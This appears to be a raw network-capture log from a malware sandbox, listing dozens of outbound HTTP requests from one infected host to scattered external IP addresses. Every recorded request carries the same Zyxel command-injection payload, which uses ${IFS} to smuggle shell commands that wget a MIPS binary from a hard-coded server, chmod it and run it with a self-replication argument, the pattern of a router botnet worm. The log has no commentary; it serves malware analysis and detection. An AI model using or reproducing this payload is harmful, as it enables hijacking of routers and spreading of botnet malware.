                                                        Jan 28, 2024 10:12:51.380765915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4082192.168.2.143637852.142.50.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380822897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4083192.168.2.144956468.65.240.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380853891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4084192.168.2.1458110160.179.118.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380886078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4085192.168.2.1433420132.45.33.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380923986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4086192.168.2.1442700183.233.50.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380963087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4087192.168.2.144028875.223.100.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380992889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4088192.168.2.1441506115.131.116.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381020069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4089192.168.2.1448088137.202.206.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381047964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4090192.168.2.1452914133.13.202.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381103039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4091192.168.2.1433860119.175.169.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381145954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4092192.168.2.144013264.22.40.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381164074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4093192.168.2.143942857.97.91.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381211042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4094192.168.2.1435190199.107.203.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381256104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4095192.168.2.143841058.164.81.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381299973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4096192.168.2.1455284177.173.7.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381333113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4097192.168.2.144444813.0.170.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381369114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4098192.168.2.1448298197.113.10.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381409883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4099192.168.2.1448756175.210.231.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381448030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4100192.168.2.144809450.152.122.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381463051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4101192.168.2.144443495.71.235.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381508112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4102192.168.2.1435540175.172.86.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381534100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4103192.168.2.145480292.238.23.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381561041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4104192.168.2.144906420.142.117.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381596088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4105192.168.2.145013864.27.160.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381620884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4106192.168.2.1434460216.198.42.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381680965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4107192.168.2.1446522117.162.105.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381711006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4108192.168.2.145291038.57.183.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381741047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4109192.168.2.1444114116.210.136.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381776094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4110192.168.2.1454720222.2.4.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381799936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4111192.168.2.1442670102.54.184.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381839991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4112192.168.2.1442754175.201.173.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381882906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4113192.168.2.1450260137.211.89.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381915092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4114192.168.2.143610867.77.211.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381968021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4115192.168.2.144788447.223.67.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.381994963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4116192.168.2.144088886.218.244.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382045984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4117192.168.2.1445382138.8.69.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382106066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4118192.168.2.144535640.68.37.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382137060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4119192.168.2.145807879.25.49.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382170916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4120192.168.2.1438258221.146.237.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382204056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4121192.168.2.1440934168.160.206.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382251024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4122192.168.2.1454292196.206.251.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382273912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4123192.168.2.144395613.80.239.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382306099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4124192.168.2.1446032174.122.3.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382333994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4125192.168.2.143473020.109.155.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382368088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4126192.168.2.144339643.143.89.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382436991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4127192.168.2.144931491.46.125.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382464886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4128192.168.2.1437052196.26.116.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382503033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4129192.168.2.144310824.68.106.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382539988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4130192.168.2.145058243.142.2.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382567883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4131192.168.2.1453712133.8.75.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382605076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4132192.168.2.1453254166.176.149.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382627010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4133192.168.2.1437248118.235.120.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382654905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4134192.168.2.144851690.146.42.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382709026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4135192.168.2.14420541.154.230.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382749081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4136192.168.2.1447908115.107.54.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382786036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4137192.168.2.1447744141.110.48.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382844925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4138192.168.2.1437518118.86.201.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382857084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4139192.168.2.143886275.151.238.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382880926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4140192.168.2.1451574222.27.166.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382910013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4141192.168.2.145244636.180.190.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.382939100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4142192.168.2.143433480.18.111.225443
                                                        TimestampBytes transferredDirectionData
